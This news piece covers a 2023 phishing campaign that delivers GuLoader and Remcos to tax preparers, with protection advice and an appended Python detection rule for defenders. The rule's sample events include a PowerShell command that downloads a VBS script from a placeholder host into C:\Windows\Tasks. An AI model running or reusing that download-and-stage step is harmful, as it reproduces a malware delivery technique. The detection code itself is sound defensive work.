
Hackers Strike at Accounting Companies in Huge Numbers

By Harper Stewart

May 4, 2023

As the US tax season draws to a close, accountants are struggling to complete and file their clients’ tax returns on time.

Unfortunately, this has provided an opportunity for attackers to launch phishing campaigns aimed at infiltrating corporate networks and stealing sensitive information from taxpayers and financial companies.

Microsoft Threat Intelligence has issued a warning about a new phishing campaign that uses remote desktop malware to gain access to victims’ networks. The attackers send emails containing infected files, hoping that exhausted tax preparers and their clients will unwittingly download and open them.

The phishing emails often contain a message similar to:

“Our individual tax filings shouldn’t take up much of your time, so I apologize for not getting back to you sooner. I’m going to presume you want a copy of everything we’ve had for the last year. Password-protected cloud storage is used for all PDF documents.”

How does it happen?

Once the infected file is downloaded and activated, the malware starts PowerShell to obtain an encrypted VBS script from a remote host, saves it to C:\Windows\Tasks, and runs it. To avoid raising suspicion, the PDF bait is opened simultaneously through Microsoft Edge. Microsoft experts warn that the GuLoader malware is downloaded and installed on the host when VBS scripts are triggered using PowerShell. The Remcos remote access Trojan is then downloaded onto the compromised device.

How to protect yourself?

The hackers’ primary targets are businesses and individuals in the accounting, tax planning, and financial sectors. To protect yourself from this type of attack, always pay close attention to the files included in emails. Be cautious about opening attachments from unknown sources, and check the file size and extension to confirm they are legitimate. Enabling the display of hidden Windows files can help detect malicious shortcuts disguised as PDF files. It is also recommended to enable the display of file extensions, so that each file’s real type is visible.
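For defenders who collect process-creation logs, the chain described under "How does it happen?" can be turned into a simple correlation rule. The following is an added example, not code from the article or from Microsoft: the event tuple layout, host names, file names, URL and 60-second window are all constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (host, time, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS-01", "2023-04-10T09:15:02", "powershell.exe",
     r"powershell.exe iwr https://files.example.invalid/a -OutFile C:\Windows\Tasks\upd.vbs"),
    ("WS-01", "2023-04-10T09:15:04", "msedge.exe",
     r"msedge.exe C:\Users\pat\AppData\Local\Temp\return_2022.pdf"),
    ("WS-01", "2023-04-10T09:15:06", "wscript.exe",
     r"wscript.exe C:\Windows\Tasks\upd.vbs"),
    ("WS-02", "2023-04-10T10:00:00", "msedge.exe",
     r"msedge.exe C:\Users\lee\Documents\invoice.pdf"),
    ("WS-02", "2023-04-10T10:30:00", "powershell.exe",
     r"powershell.exe Get-ChildItem C:\Windows\Tasks"),
]

# A .vbs file under C:\Windows\Tasks referenced on a command line.
TASKS_VBS = re.compile(r"c:\\windows\\tasks\\[^\s\"']+\.vbs\b", re.I)
PDF_ARG = re.compile(r"\.pdf\b", re.I)
SCRIPT_RUNNERS = {"powershell.exe", "wscript.exe", "cscript.exe"}
WINDOW = timedelta(seconds=60)  # assumed correlation window

def detect(events, window=WINDOW):
    """Return {host: {"severity", "scripts"}} for hosts touching VBS in C:\\Windows\\Tasks."""
    per_host = {}
    for host, ts, image, cmd in events:
        when = datetime.fromisoformat(ts)
        entry = per_host.setdefault(host, {"vbs": [], "decoy": []})
        match = TASKS_VBS.search(cmd)
        if image.lower() in SCRIPT_RUNNERS and match:
            entry["vbs"].append((when, match.group(0).lower()))
        elif image.lower() == "msedge.exe" and PDF_ARG.search(cmd):
            entry["decoy"].append(when)
    alerts = {}
    for host, entry in per_host.items():
        if not entry["vbs"]:
            continue  # a PDF opened in Edge is not suspicious on its own
        # Severity rises when the PDF bait opens close in time to the script activity.
        paired = any(abs(tv - td) <= window
                     for tv, _ in entry["vbs"] for td in entry["decoy"])
        alerts[host] = {"severity": "high" if paired else "medium",
                        "scripts": sorted({path for _, path in entry["vbs"]})}
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

In practice the same rule would be written in the query language of the SIEM or EDR in use, with field names taken from that product.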

 